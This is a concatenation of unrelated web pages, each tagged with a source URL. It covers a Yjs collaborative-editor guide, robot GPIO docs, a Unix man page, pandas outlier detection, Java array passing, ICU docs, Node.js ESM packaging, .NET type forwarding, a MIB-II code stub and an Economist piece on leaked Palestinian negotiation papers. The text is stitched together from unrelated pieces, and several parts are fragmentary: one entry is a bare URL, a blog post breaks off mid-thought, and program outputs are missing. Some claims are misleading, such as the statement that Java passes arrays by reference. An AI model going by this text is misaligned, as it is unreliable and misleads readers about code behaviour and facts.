Yjs is a modular framework for syncing things in real-time - like editors! This guide will walk you through the main concepts of Yjs. First, we are going to create a collaborative editor and sync it with clients. You will be introduced to Yjs documents and to providers, which allow you to sync through different network protocols. Next, we talk about Awareness & Presence, which are very important aspects of collaborative software. I created a separate section for Offline Support that shows you how to create offline-ready applications by adding just a few lines of code. The last section is an in-depth guide to Shared Types. If you are impatient, jump to the live demo at the bottom of the page 😉

Let's get started by deciding on an editor to use. Yjs doesn't ship with a customized editor. There are already a lot of awesome open-source editor projects out there, and Yjs supports many of them using extensions. Editor bindings are a concept in Yjs that allow us to bind the state of a third-party editor to a syncable Yjs document. This is a list of all known editor bindings:

For the purpose of this guide, we are going to use the Quill editor - a great rich-text editor that is easy to set up. For a complete reference on how to set up Quill, I refer to their documentation.

```js
import Quill from 'quill'

const quill = new Quill(document.querySelector('#editor'), {
  modules: {
    cursors: true,
    toolbar: [
      // adding some basic Quill content features
      [{ header: [1, 2, false] }],
      ['bold', 'italic', 'underline'],
      ['image', 'code-block']
    ],
    history: {
      // Local undo shouldn't undo changes
      // from remote users
      userOnly: true
    }
  },
  placeholder: 'Start collaborating...',
  theme: 'snow' // 'bubble' is also great
})
```

<link href="" rel="stylesheet"><div id="editor" />

npm i quill

Next, we are going to install Yjs and the y-quill editor binding.
npm i yjs y-quill

```js
import * as Y from 'yjs'
import { QuillBinding } from 'y-quill'

// A Yjs document holds the shared data
const ydoc = new Y.Doc()
// Define a shared text type on the document
const ytext = ydoc.getText('quill')
// Create an editor-binding which
// "binds" the quill editor to a Y.Text type.
const binding = new QuillBinding(ytext, quill)
```

The ytext object is a shared data structure for representing text. It also supports formatting attributes (i.e. bold and italic). Yjs automatically resolves concurrent changes on shared data, so we don't have to worry about conflict resolution anymore. Then we synchronize ytext with the Quill editor and keep them in sync using the QuillBinding. Almost all editor bindings work like this, so you can simply exchange the editor binding if you switch to another editor. But don't stop here - the editor doesn't sync to other clients yet! We need to choose a provider or implement our own communication protocol to exchange document updates with other peers.

Each provider has pros and cons. The y-webrtc provider connects clients directly with each other and is a perfect choice for demo applications because it doesn't require you to set up a server. But for a real-world application, you often want to sync the document to a server. In any case, we've got you covered. It is easy to change the provider because they all implement the same interface.

```js
import { WebrtcProvider } from 'y-webrtc'

const provider = new WebrtcProvider('quill-demo-room', ydoc)
```

```js
import { WebsocketProvider } from 'y-websocket'

// connect to the public demo server (not in production!)
const provider = new WebsocketProvider('wss://demos.yjs.dev', 'quill-demo-room', ydoc)
```

```js
import { DatProvider } from 'y-dat'

// set null in order to create a fresh
const datKey = '7b0d584fcdaf1de2e8c473393a31f52327793931e03b330f7393025146dc02fb'
const provider = new DatProvider(datKey, ydoc)
```

npm i y-webrtc # or
npm i y-websocket # or
npm i y-dat

Providers work similarly to editor bindings.
They sync Yjs documents through a communication protocol or a database. Most providers have in common that they use the concept of room-names to connect Yjs documents. In the above example, all documents that specify 'quill-demo-room' as the room-name will sync.

Providers are meshable. You can connect multiple providers to a Yjs instance at the same time. Document updates will automatically sync through the different communication channels. Meshing providers can improve reliability through redundancy and decrease network delay.

By combining Yjs with providers and editor bindings we created our first collaborative editor. In the following sections, we will explore more Yjs concepts like awareness, shared types, and offline editing. But for now, let's enjoy what we built. I included the same fiddle twice so you can observe the editors sync in real-time. Beware: the editor content is synced with all users visiting this page!
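To illustrate the room-name idea described above, here is a toy model in plain JavaScript. This is not the Yjs or provider API; `Hub`, `join`, and `publish` are invented names. It only shows the concept: every client that joins the same room-name receives every update published in that room.

```javascript
// Toy illustration of room-based syncing (NOT the real Yjs API).
class Hub {
  constructor() { this.rooms = new Map() }
  join(roomName, onUpdate) {
    if (!this.rooms.has(roomName)) this.rooms.set(roomName, new Set())
    this.rooms.get(roomName).add(onUpdate)
  }
  publish(roomName, update, sender) {
    for (const fn of this.rooms.get(roomName) || new Set()) {
      if (fn !== sender) fn(update) // don't echo back to the sender
    }
  }
}

const hub = new Hub()
const docA = [], docB = [], docC = []
const onA = u => docA.push(u)
const onB = u => docB.push(u)
const onC = u => docC.push(u)

hub.join('quill-demo-room', onA)
hub.join('quill-demo-room', onB)
hub.join('another-room', onC)

hub.publish('quill-demo-room', 'insert "H" at 0', onA)
// docB received the update; docC, in a different room, did not
```

A real provider adds a transport (WebRTC, WebSocket, a database) and Yjs's update encoding on top of this broadcast idea, which is also why several providers can be meshed at once.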
https://docs.yjs.dev/getting-started/a-collaborative-editor
GPIO (General Purpose Input Output) is a type of pin that the brain box has. They are very useful, as they allow switches and other sensors to be added very easily. First you must select the mode that the pin should operate in by using:

```python
from sr.robot import *

R = Robot()  # Standard initialization process
R.gpio.pin_mode(<PIN>, <MODE>)
```

The pins are indexed from 1 to 4. The mode can be set to one of 3 modes:

- OUTPUT – sets the pin up as an output
- INPUT_ANALOG – sets the pin up to take analog readings
- INPUT_PULLUP – creates a weak pull-up on the pin to prevent it floating and sets it as an input

GPIO as outputs

If you selected the OUTPUT mode, you will be able to set the state of the pin by using:

```python
R.gpio.digital_write(<PIN>, <STATE>)
```

where the state is a Boolean (True or False) value that the pin should be set to.

GPIO as digital inputs

A disconnected input pin "floats" with no defined voltage, so a weak pull-up is used to hold the pin high until something drives it low. This is why the digital input mode is called INPUT_PULLUP. When the pin is set to be a digital input, there is a piece of code that can be called and will return a value:

```python
R.gpio.digital_read(<PIN>)
```

This piece of code can then be used to assign a value to a variable, like so:

```python
result = R.gpio.digital_read(<PIN>)
```

You can then use that value for whatever you like. For example, to do something if GPIO 1 is high:

```python
from sr.robot import *

R = Robot()
R.gpio.pin_mode(1, INPUT_PULLUP)
result = R.gpio.digital_read(1)
if result == True:
    print('So it is True')
```

GPIO as analog inputs

In this mode the pins are used in much the same way as before:

```python
R.gpio.analog_read(<PIN>)
```

Only this time it will return a value between 1 and 16384. GPIO 3 is incapable of being an analogue input and will return an error.
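As a rough illustration of what the 1 to 16384 reading means, it can be mapped linearly onto a voltage. The helper below is not part of the sr.robot API, and the 5 V reference is an assumption; check your kit's actual reference voltage.

```python
def reading_to_volts(reading, v_ref=5.0):
    """Map a raw analog reading (1..16384) onto 0..v_ref volts.

    Assumes a linear 14-bit ADC and a 5 V reference by default.
    Illustrative helper only; not part of the sr.robot API.
    """
    if not 1 <= reading <= 16384:
        raise ValueError("reading out of range")
    return (reading - 1) / 16383 * v_ref

# A mid-scale reading maps to roughly half the reference voltage
print(round(reading_to_volts(8192), 2))  # → 2.5
```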
http://hr-robocon.org/docs/gpio
https://www.geeksforgeeks.org/stduniform_real_-distribution-class-in-c-with-examples/?ref=rp
NAME

etext, edata, end - end of program segments

SYNOPSIS

extern etext;
extern edata;
extern end;

DESCRIPTION

The addresses of these symbols indicate the end of various program segments:

- etext – the first address past the end of the text segment (the program code)
- edata – the first address past the end of the initialized data segment
- end – the first address past the end of the uninitialized data segment (also known as the BSS segment)

CONFORMING TO

Although these symbols have long been provided on most UNIX systems, they are not standardized; use with caution.

NOTES

The symbols must be declared by the program using them; they are not defined in any header file. When a program starts, its program break will lie somewhere close to &end; the break changes as memory is allocated via brk(2) or malloc(3).

EXAMPLES

When run, the program below produces output such as the following:

$ ./a.out
First address past:
    program text (etext)       0x8048568
    initialized data (edata)   0x804a01c
    uninitialized data (end)   0x804a024

Program source

#include <stdio.h>
#include <stdlib.h>

extern char etext, edata, end; /* The symbols must have some type,
                                  or "gcc -Wall" complains */

int
main(int argc, char *argv[])
{
    printf("First address past:\n");
    printf("    program text (etext)      %10p\n", &etext);
    printf("    initialized data (edata)  %10p\n", &edata);
    printf("    uninitialized data (end)  %10p\n", &end);

    exit(EXIT_SUCCESS);
}
https://manpages.debian.org/unstable/manpages-dev/end.3.en.html
In this "How to" tutorial, you will learn how to find and handle outliers, and do outlier analysis on multivariate data (more than one variable or feature). You will learn:

- How to handle outliers using the box plot method
- How to find outliers using scatter plot matrices

First of all, to detect the outliers, import all the necessary libraries. I am writing all the code in a Jupyter notebook, so make sure to follow the same process with me for better understanding.

```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from pylab import rcParams
import seaborn as sb
%matplotlib inline
rcParams["figure.figsize"] = 10, 6
```

About the dataset

For demonstration purposes, I am using the Iris dataset. It has 5 columns, with 4 columns as the variables (features) and the last column (species) as the target. These columns are sepal length, sepal width, petal length, petal width, and species. Let's read the dataset and define the data and the target.

```python
iris_data = pd.read_csv("data/iris.data.csv", header=None, sep=",")
iris_data.columns = ["sepal length", "sepal width", "petal length", "petal width", "species"]
data = iris_data.iloc[:, 0:4].values    # read the values of the first 4 columns
target = iris_data.iloc[:, 4].values    # read the values of the last column
iris_data[:5]
```

In the third and fourth lines, we selected the data and the target. For the data, you choose the values of all four columns (sepal length, sepal width, petal length, petal width), and for the target, you choose the species column.

How to handle outliers using the box plot method?

The box plot is built around the interquartile range (IQR), which is used to find the outliers in the dataset. I am not going into the details about it here; for more reading, check the Measurement of Dispersion post, which covers how to find the interquartile range and fences. Visualizing is the best way to understand anything.
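The interquartile-range rule behind the box plot can also be sketched numerically, with the standard library alone and no plotting. The fence multiplier 1.5 is the usual Tukey convention, and the sample values are toy data, not the Iris dataset.

```python
import statistics

def iqr_outliers(values):
    """Return values lying outside the Tukey fences (Q1 - 1.5*IQR, Q3 + 1.5*IQR)."""
    q1, _, q3 = statistics.quantiles(values, n=4)  # quartiles
    iqr = q3 - q1
    low, high = q1 - 1.5 * iqr, q3 + 1.5 * iqr
    return [v for v in values if v < low or v > high]

# Toy sepal-length-like data with one obviously odd value
sepal_lengths = [5.0, 5.1, 4.9, 5.2, 5.0, 5.1, 4.8, 5.3, 9.9]
print(iqr_outliers(sepal_lengths))  # → [9.9]
```

The box plot in the next step draws exactly these fences: points beyond the whiskers are the same points this function would flag.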
For seeing the outliers in the Iris dataset, use the following code:

```python
sb.boxplot(x="species", y="sepal length", data=iris_data, palette="hls")
```

On the x-axis you use the species type and on the y-axis the sepal length. In this case, you will find that the species virginica has outliers when you consider the sepal length. You can clearly see the dot point above the box for virginica.

Finding the outliers using scatter plot matrices

Above we used a box plot. This time, I will use Seaborn's pair plot to find the outliers in a scatter plot matrix. The following figure will give the pair plot according to the species:

```python
sb.pairplot(iris_data, hue="species", palette="hls")
```

Inside the pairplot() method you pass the first argument as the data frame (iris_data), hue ("species") for specifying the column used for labeling, and the palette "hls". In the above figure, you can see the odd red point that doesn't fit any of the clusters. The species is setosa. Note that point and remove the record from the dataset. Here the record is at cell 41. Delete it.

Conclusion

Finding outliers is an important task in data pre-processing. If there are outliers, then your machine learning predictions will not be accurate. Therefore, if you have a large dataset, always make sure that the percentage of outliers is less than 5%. Hope this tutorial has given you a clear understanding of how to handle outliers in multivariate data. If you have any questions about dealing with data, then please contact us.

Thanks
Data Science Learner Team
https://www.datasciencelearner.com/handle-outliers-multivariate-outlier-detection/
This Tutorial will Explain How to Pass an Array as an Argument to a Method and as a Return Value for the Method in Java with Examples.

Methods or functions are used in Java to break the program into smaller modules. These methods are called from other functions, and while doing so data is passed to and from these methods and the calling functions. The data passed from the calling function to the called function is in the form of arguments or parameters to the function. The data returned from the function is the return value.

Usually, all the primitive and derived types can be passed to and returned from a function. Likewise, arrays can also be passed to a method and returned from a method. In this tutorial, we will discuss how to pass arrays as an argument to a method and return an array from a method.

Passing Array To The Method In Java

Given below is the method prototype:

```java
void method_name(int[] array);
```

This means method_name will accept an array parameter of type int. So if you have an int array named myarray, then you can call the above method as follows:

```java
method_name(myarray);
```

The above call passes the reference to the array myarray to the method method_name. Thus, the changes made to myarray inside the method will reflect in the calling method as well.

Unlike in C/C++, you need not pass the length parameter along with the array to the method, as all Java arrays have a 'length' property. However, it might be advisable to also pass the number of filled elements in case only a few positions in the array are filled.

The following Java program demonstrates the passing of an array as a parameter to a method.
```java
public class Main {
    // method to print an array, taking the array as an argument
    private static void printArray(Integer[] intArray) {
        System.out.println("Array contents printed through method:");
        // print individual elements of the array using an enhanced for loop
        for (Integer val : intArray)
            System.out.print(val + " ");
    }

    public static void main(String[] args) {
        // integer array
        Integer[] intArray = {10, 20, 30, 40, 50, 60, 70, 80};
        // call the printArray method, passing intArray as an argument
        printArray(intArray);
    }
}
```

Output:

In the above program, an array is initialized in the main function. Then the method printArray is called, to which this array is passed as an argument. In the printArray method, the array is traversed and each element is printed using the enhanced for loop.

Let us take another example of passing arrays to methods. In this example, we have implemented two classes. One class contains the calling method main, while the other class contains the method to find the maximum element in the array. The main method calls the method in the other class by passing the array to the method find_max. The find_max method calculates the maximum element of the input array and returns it to the calling function.
```java
import java.util.Arrays;

class maxClass {
    public int find_max(int[] myarray) {
        int max_val = 0;
        // traverse the array to compare each element with max_val
        for (int i = 0; i < myarray.length; i++) {
            if (myarray[i] > max_val) {
                max_val = myarray[i];
            }
        }
        // return max_val
        return max_val;
    }
}

public class Main {
    public static void main(String args[]) {
        // input array
        int[] myArray = {43, 54, 23, 65, 78, 85, 88, 92, 10};
        System.out.println("Input Array:" + Arrays.toString(myArray));

        // create an object of the class which has the method to find the maximum
        maxClass obj = new maxClass();
        // pass the input array to the find_max method, which returns the maximum element
        System.out.println("Maximum value in the given array is::" + obj.find_max(myArray));
    }
}
```

Output:

In the above program, we passed the array from a method in one class to a method in a different class. Note that the approach to passing an array is the same whether the method is in the same class or a different class.
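Because only the reference is copied when an array is passed, changes made inside the called method are visible to the caller. A small sketch (class and method names here are illustrative, not from the tutorial above):

```java
public class ReferenceDemo {
    // doubles each element in place; the caller sees the change
    static void doubleAll(int[] arr) {
        for (int i = 0; i < arr.length; i++) {
            arr[i] = arr[i] * 2;
        }
    }

    public static void main(String[] args) {
        int[] nums = {1, 2, 3};
        doubleAll(nums);
        // the caller's array was modified through the reference
        System.out.println(java.util.Arrays.toString(nums)); // prints [2, 4, 6]
    }
}
```

If you do not want the caller's array to change, pass a copy, for example `java.util.Arrays.copyOf(nums, nums.length)`.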
How To Return An Array In Java

Apart from all the primitive types that you can return from Java programs, you can also return references to arrays. While returning a reference to an array from a method, you should keep in mind that:

- The return type should be declared as an array of the appropriate data type.
- The value returned from the method is a reference to the array.

An array is returned from a method in cases where you need to return multiple values of the same type. This approach becomes useful as Java doesn't allow returning multiple values directly.

The following program returns a string array from a method.

```java
import java.util.*;

public class Main {
    public static String[] return_Array() {
        // define a string array
        String[] ret_Array = {"Java", "C++", "Python", "Ruby", "C"};
        // return the string array
        return ret_Array;
    }

    public static void main(String args[]) {
        // call the return_Array method, which returns an array
        String[] str_Array = return_Array();
        System.out.println("Array returned from method:" + Arrays.toString(str_Array));
    }
}
```

Output:

The above program is an example of returning an array reference from a method. The return_Array method declares an array of strings ret_Array and then simply returns it. In the main method, the return value from return_Array is assigned to a string array and then displayed.

The following program provides another example of returning an array from a method. Here, we use an integer array that stores the computed random numbers, and then this array is returned to the caller.

```java
public class Main {
    public static void main(String[] args) {
        final int N = 10; // number of random elements

        // declare an array
        int[] random_numbers;

        // call the create_random method, which returns an array of random numbers
        random_numbers = create_random(N);
        System.out.println("The array of random numbers:");
        // display the array of random numbers
        for (int i = 0; i < random_numbers.length; i++) {
            System.out.print(random_numbers[i] + " ");
        }
    }

    public static int[] create_random(int N) {
        // create an array of size N => the number of random numbers to be generated
        int[] random_array = new int[N];
        // generate random numbers and assign them to the array
        for (int i = 0; i < random_array.length; i++) {
            random_array[i] = (int) (Math.random() * 10);
        }
        // return the array of random numbers
        return random_array;
    }
}
```

Output:

Sometimes the result of a computation is null or empty. In this case, most of the time, functions return null. When arrays are involved, it is better to return an empty array instead of null, because the method of returning the array will then be handled consistently.
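The empty-array-instead-of-null advice can be sketched like this (the class and method names are invented for illustration): the caller loops the same way whether or not anything matched, with no null check needed.

```java
public class EmptyArrayDemo {
    // returns matching elements, or an empty array (never null) when nothing matches
    static int[] evensOnly(int[] input) {
        int count = 0;
        for (int v : input) if (v % 2 == 0) count++;

        int[] result = new int[count];   // length 0 when there are no matches
        int i = 0;
        for (int v : input) if (v % 2 == 0) result[i++] = v;
        return result;
    }

    public static void main(String[] args) {
        // same loop works for both the empty and the non-empty result
        for (int v : evensOnly(new int[]{1, 3, 5})) System.out.println(v); // prints nothing
        for (int v : evensOnly(new int[]{1, 2, 4})) System.out.println(v);
    }
}
```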
Also, the caller need not have special code to handle null values.

Frequently Asked Questions

Q #1) Does Java pass arrays by reference?

Answer: Yes. Arrays are passed by reference by default. While passing an array to a function, we simply provide the name of the array, which evaluates to the starting address of the array.

Q #2) Why are arrays not passed by value?

Answer: Arrays cannot be passed by value because the array name that is passed to the method evaluates to a reference.

Q #3) Can an array be returned in Java?

Answer: Yes, we can return an array in Java. We have already given examples of returning arrays in this tutorial.

Q #4) Can a method return multiple values?

Answer: According to the specification, Java methods cannot return multiple values. But we can have roundabout ways to simulate returning multiple values. For example, we can return arrays that hold multiple values, or collections for that matter.

Q #5) Can a method have two return statements in Java?

Answer: A method can contain more than one return statement (for example, in different branches), but only one of them executes on any given call, and Java doesn't allow a method to return more than one value.

Conclusion

Java allows arrays to be passed to a method as an argument as well as to be returned from a method. Arrays are passed to a method by reference: when calling a particular method, the array name, which points to the starting address of the array, is passed. Similarly, when an array is returned from a method, it is the reference that is returned.

In this tutorial, we discussed the above topics in detail with examples. In our subsequent tutorials, we will cover more topics on arrays in Java.
https://www.softwaretestinghelp.com/pass-return-array-in-java/
C++ API: "Smart pointers" for use with and in ICU4C C++ code.

#include "unicode/utypes.h"
#include <memory>

Go to the source code of this file.

These classes are inspired by existing smart pointer classes (such as std::unique_ptr), but none of those provide for all of the goals for ICU smart pointers. For details see

Definition in file localpointer.h.

"Smart pointer" definition macro: deletes objects via the closeFunction. It defines a subclass of LocalPointerBase which works just like LocalPointer<Type>, except that this subclass will use the closeFunction rather than the C++ delete operator.

Usage example:

Definition at line 550 of file localpointer.h.
https://unicode-org.github.io/icu-docs/apidoc/dev/icu4c/localpointer_8h.html
This article was published on Thursday, August 12, 2021 by Pablo Sáez @ The Guild Blog

ECMAScript modules, also known as ESM, is the official standard format to package JavaScript, and fortunately Node.js supports it 🎉.

But if you have been in the Node.js Ecosystem for some time, developing libraries, you have probably encountered the fact that ESM compatibility has been a struggle: behind experimental flags and/or broken for practical usage. Very few libraries actually supported it officially, but since Node.js v12.20.0 (2020-11-24) and v14.13.0 (2020-09-29) the latest and finally stable version of the package.json exports field is available, and since support for Node.js v10.x is dropped, everything should be fine and supporting ESM shouldn't be that hard.

After working on migrating all The Guild libraries, for example GraphQL Code Generator or the recently released Envelop, and contributing to other important libraries in the ecosystem, like graphql-js, I felt like sharing this experience is really valuable, and the current state of ESM in the Node.js Ecosystem as a whole needs some extra care from everyone.

This post is intended to work as a guide to support both CommonJS and ESM and will be updated accordingly in the future as needed. One key feature that makes this possible is the package.json exports field.

exports field

The official Node.js documentation about it is available here, but the most interesting section is Conditional exports, which enables libraries to support both CommonJS and ESM:

```json filename="package.json"
{
  "name": "foo",
  "exports": {
    "require": "./main.js",
    "import": "./main.mjs"
  }
}
```

This field basically tells Node.js what file to use when importing/requiring the package.
But very often you will encounter the situation that a library can (and should, in my opinion) ship the library keeping its file structure, which allows the library user to import/require only the modules they need for their application, or simply for the fact that a library can have more than a single entry-point.

For the reason just mentioned, the standard `package.json#exports` should look something like this (even for single entry-point libraries, it won't hurt in any way):

> Assuming that the build/compilation/transpilation is outputted into the "dist" folder

```jsonc
{
  // package.json
  "name": "foo",
  "exports": {
    ".": {
      "require": "./dist/index.js",
      "import": "./dist/index.mjs"
    },
    "./*": {
      "require": "./dist/*.js",
      "import": "./dist/*.mjs"
    }
  }
}
```

To specify specific paths for deep imports, you can list them explicitly:

```jsonc
"exports": {
  // ...
  "./utils": {
    "require": "./dist/utils.js",
    "import": "./dist/utils.mjs"
  }
}
```

If you don't want to break backward compatibility on import/require with the explicit .js, the solution is to add the extension in the export:

```jsonc
"exports": {
  // ...
  "./utils": {
    "require": "./dist/utils.js",
    "import": "./dist/utils.mjs"
  },
  "./utils.js": {
    "require": "./dist/utils.js",
    "import": "./dist/utils.mjs"
  }
}
```

Using the .mjs extension

To add ESM support for Node.js, you have two alternatives:

- build your library into ESM-compatible modules with the extension .mjs, and keep the CommonJS version with the standard .js extension
- build your library into ESM-compatible modules with the extension .js, set "type": "module", and give the CommonJS version of your modules the .cjs extension

Clearly using the .mjs extension is the cleaner solution, and everything should work just fine.

ESM Compatible

This section assumes that your library is written in TypeScript or at least has a transpilation process; if your library is targeting the browser and/or React.js, it most likely already does.
Building a library to be compatible with ESM might not be as straightforward as we would like, for the simple fact that in the pure ESM world require doesn't exist, as simple as that. You will need to refactor any require into import.

Changing require

If you have a top-level require, changing it to ESM should be straightforward. From:

```js
const foo = require('foo')
```

to

```js
import foo from 'foo'
```

But if you are dynamically calling require inside of functions, you will need to do some refactoring to handle async imports. From:

```js
function getFoo() {
  const { bar } = require('foo')
  return bar
}
```

to

```js
async function getFoo() {
  const { bar } = await import('foo')
  return bar
}
```

What about __dirname, require.resolve, require.cache?

This is when it gets complicated: as the Node.js documentation notes, these CommonJS variables are not available in ES modules; you should use import and export instead.

The only workaround to have an isomorphic __dirname or __filename usable in both "cjs" and "esm" without build-time tools like @rollup/plugin-replace or esbuild "define" would be using a library like filedirname, which does a trick inspecting error stacks; it's clearly not the cleanest solution. The workaround, alongside createRequire, would look like this:

```js
import filedirname from 'filedirname'
import { createRequire } from 'module'

const [filename] = filedirname()
const require_isomorphic = createRequire(filename)

require_isomorphic('foo')
```

require.resolve and require.cache are not available in the ESM world, and if you are not able to refactor away from them, you could use createRequire, but keep in mind that the cache and file resolution are not the same as while using import in ESM.
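One detail that softens the require-to-import refactor: dynamic `import()` is also available from CommonJS files, so lazy requires can be migrated function by function. A small sketch, using the built-in `node:path` module as a stand-in for a real dependency:

```javascript
// Sketch of refactoring a lazy require into an async import.
// Dynamic import() works from CommonJS too, so this migration
// can be done incrementally. 'node:path' stands in for a dependency.
async function getJoin() {
  const { join } = await import('node:path')
  return join
}

getJoin().then(join => {
  console.log(join('a', 'b')) // e.g. "a/b" on POSIX systems
})
```

The cost is that every caller of such a function becomes async as well, which is usually the bulk of the refactoring work.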
Deep import of node_modules packages

Part of the ESM specification is that you have to specify the extension in explicit script imports, which means that when you are importing a specific JavaScript file from a node_modules package, you have to specify the .js extension, otherwise all the users will get Error [ERR_MODULE_NOT_FOUND]: Cannot find module.

This won't work in ESM:

```js
import { foo } from 'foo/lib/main'
```

But this will:

```js
import { foo } from 'foo/lib/main.js'
```

BUT there is a big exception to this: when the node_modules package you are importing uses the exports package.json field. Generally the exports field will have the extension in the alias itself, and if you specify the extension on those packages, it will result in a double extension:

```json filename="bar/package.json"
{
  "name": "bar",
  "exports": {
    "./*": {
      "require": "./dist/*.js",
      "import": "./dist/*.mjs"
    }
  }
}
```

```ts
import { bar } from 'bar/main.js'
```

That will translate into node_modules/bar/dist/main.js.js in CommonJS and node_modules/bar/dist/main.js.mjs in ESM.

Can we test if everything is actually ESM compatible?

The best solution for this is to have ESM examples in a monorepo, testing firsthand that nothing breaks with the logic included; tools that output both CommonJS & ESM, like tsup, might become very handy, but that might not be straightforward, especially for big projects.

There is a relatively small but effective way of automated testing for all the top-level imports in ESM: you can have an ESM script that imports every .mjs file of your project. It will quickly scan, importing everything, and if nothing breaks, you are good to go 👍. Here is a small example of a script that does this, and it's currently used in some projects that support ESM.
TypeScript

In regard to TypeScript supporting ESM, it divides into two subjects:

Support for exports

Until the issue TypeScript#33069 is closed, TypeScript doesn't have complete support for it. Fortunately, there are 2 workarounds:

- Using typesVersions

The original usage of this TypeScript feature was not for this purpose, but it works, and it's a fine workaround until TypeScript actually supports exports:

```json filename="package.json"
{
  "typesVersions": {
    "*": {
      "dist/index.d.ts": ["dist/index.d.ts"],
      "*": ["dist/*", "dist/*/index.d.ts"]
    }
  }
}
```

- Publishing a modified version of the package

This method requires tooling and/or support from the package manager. For example, using the package.json field `publishConfig.directory`: pnpm supports it and lerna publish as well. This allows you to publish a modified version of the package that can contain a modified version of the `exports`, with the types following the file structure in the root, and TypeScript will understand it without needing anything special in the package.json for it to work.

```json filename="dist/package.json"
{
  "exports": {
    "./*": {
      "require": "./*.js",
      "import": "./*.mjs"
    },
    ".": {
      "require": "./index.js",
      "import": "./index.mjs"
    }
  }
}
```

In The Guild we use this method with tooling that creates the temporary package.json automatically. See bob-the-bundler & bob-esbuild.

Support for .mjs output

Currently, the TypeScript compiler can't output .mjs; check the issue TypeScript#18442. There are workarounds, but nothing actually works in 100% of the possible use-cases (see, for example, the ts-jest issue), and for that reason we recommend tooling that enables this type of build without needing any workaround, usually using Rollup and/or esbuild.

ESM needs our attention

There are still some rough edges while supporting ESM; this guide shows only some of them, but now it's time to rip the bandaid off.
I can mention a very famous contributor of the Node.js Ecosystem, sindresorhus, who has a very strong stance on ESM: his blog post Get Ready For ESM and a GitHub Gist that is nowadays very common in a lot of the very important libraries he maintains.

But personally, I don't think only supporting ESM and killing CommonJS should be the norm; both standards can live together. There is already a big ecosystem behind CommonJS, and we shouldn't ignore it.

Top comments (1)

I disagree; the big hurdle is exactly because there are two competing systems where one is used more than the other but is not the default. This is a sign that CommonJS is at death's gate. Let's move on.
https://dev.to/the-guild/what-does-it-take-to-support-node-js-esm-lop
MS topic. If you Bing "type forwarding" you'll find many blogs that talk about it as well. Yes, that's right. I used Bing as a verb. Get used to it; Bing is awesome.

Example: TimeZoneInfo.

Walkthrough 1: Observe the forwarding of System.TimeZoneInfo

This walkthrough assumes you have .NET 4.0 Beta 1 installed (see here) and an older release of .NET, such as .NET 3.5, installed.

Code up a simple C# app that uses System.TimeZoneInfo:

```csharp
namespace test
{
    class Class1
    {
        static void Main(string[] args)
        {
            System.TimeZoneInfo ti = null;
        }
    }
}
```

Next, compile this into an exe using a CLR V2-based toolset (e.g., .NET 3.5). You can use Visual Studio, or just run from the command-line (but be sure your path points to the pre-.NET 4.0 C# compiler!). Example:

Again, be sure you're using an old csc.exe from, say, a .NET 3.5 installation. To verify, open up Class1.exe in ildasm and take a look at Main(). It should look something like this:

The key here is to note that the IL uses a TypeRef for System.TimeZoneInfo (01000006) that points to System.Core.dll.

Ok, so how do we run this pre-.NET 4.0 executable against .NET 4.0? A config file, of course. Paste the following into a file named Class1.exe.config that sits next to Class1.exe:…

Walkthrough 2: Forwarding your own type

To experiment with forwarding your own types, the process is:

- Create Version 1 of your library
- Create version 1 of your library assembly that defines your type (MyLibAssemblyA.dll)
- Create an app that references your type in MyLibAssemblyA.dll (MyClient.exe)
- Create version 2 of your library
- Recompile MyLibAssemblyA.dll to forward your type elsewhere (MyLibAssemblyB.dll)
- Don't recompile MyClient.exe. Let it still think the type is defined in MyLibAssemblyA.dll.

Version 1

Just make a simple C# DLL that includes your type Foo. Something like this (MyLibAssemblyA.cs):

```csharp
using System;

public class Foo { }
```

and compile it into MyLibAssemblyA.dll:

Then make yourself a client app that references Foo.
using System; public class Test { public static void Main() { Foo foo = new Foo(); Console.WriteLine(typeof(Foo).AssemblyQualifiedName); } } and compile this into MyClient.exe: When you run MyClient.exe, you get this boring output: Ok, time to upgrade! Version 2 Time goes by, your library is growing, and it's time to split it into two DLLs. Gotta move Foo into the new DLL. Save this into MyLibAssemblyB.cs: using System; public class Foo { } compile that into your new DLL, MyLibAssemblyB.dll: And now for the type forward. MyLibAssemblyA.cs now becomes: using System; using System.Runtime.CompilerServices; [assembly: TypeForwardedTo(typeof(Foo))] compile that into MyLibAssemblyA.dll (overwriting your Version 1 copy of that DLL): Now, when you rerun MyClient.exe (without recompiling!), it will look for Foo first in MyLibAssemblyA.dll, and then hop over to MyLibAssemblyB.dll: And all this despite the fact that MyClient.exe still believes that Foo lives in MyLibAssemblyA: Profilers. In any case, whether or not you think your profiler will be affected by type forwarding, be sure to test, test, test!
https://blogs.msdn.microsoft.com/davbr/2009/09/30/type-forwarding/
CC-MAIN-2019-35
#include "core/net.h" #include "mibs/mib2_module.h" #include "mibs/mib2_impl.h" #include "core/crypto.h" #include "encoding/asn1.h" #include "encoding/oid.h" #include "debug.h" MIB-II module. The second version of the Management Information Base (MIB-II) is used to manage TCP/IP-based hosts. Refer to the relevant RFCs for complete details. Definition in file mib2_module.c. Definition at line 37 of file mib2_module.c. MIB-II base. Definition at line 56 of file mib2_module.c. MIB-II module. Definition at line 2201 of file mib2_module.c. MIB-II objects. Definition at line 63 of file mib2_module.c.
https://oryx-embedded.com/doc/mib2__module_8c.html
Jan 24th 2011, 18:27 by The Economist online | RAMALLAH FOR almost 24 hours, Al Jazeera, the Arab world’s most popular news channel, has led its bulletins with reports of outlandish concessions made by Palestinian officials during negotiations with Israel since 1999. So grave were the allegations contained in some 1,600 documents and 50 maps leaked to the channel, claimed commentators drafted into Al Jazeera's studios, that they would end the last kicks from the dying horse of the peace process, and unseat the Palestinian leadership. If anything, the first batch of leaked papers appears to do the opposite. How Al Jazeera’s spin will play out amongst the Palestinian public is unclear. Allies of the Palestinian president, Mahmoud Abbas, predictably denounced the messenger, sidestepping its message, by attacking Al Jazeera’s offices. A senior Palestinian official, Yasser Abd Rabbo, accused the Emir of Qatar, the small Gulf state that owns Al Jazeera, of conducting a campaign against Mr Abbas in order to project his regional influence. Ramallah’s rumour-mill blamed Mohammed Dahlan, a former security chief, against whom Mr Abbas recently launched an investigation on suspicion of plotting to overthrow him. Only last week, Mr Dahlan’s aides threatened to release embarrassing documents if what he termed the "witch-hunt" by Mr Abbas persisted. On current evidence, the leaks are just as awkward for Israel. They contradict the official Israeli narrative that the Palestinians rejected generous Israeli offers, and portray Palestinians as initiating ideas, only to be stymied by Israeli stonewalling. They give credence to Palestinian claims that Mr Netanyahu made no counter-proposals. Had a more responsive Israeli prime minister been in charge, or had the Obama administration picked up from where his predecessors left off, rather than frittering away two years on an elusive settlement freeze, a two-state agreement might yet have looked imminent.
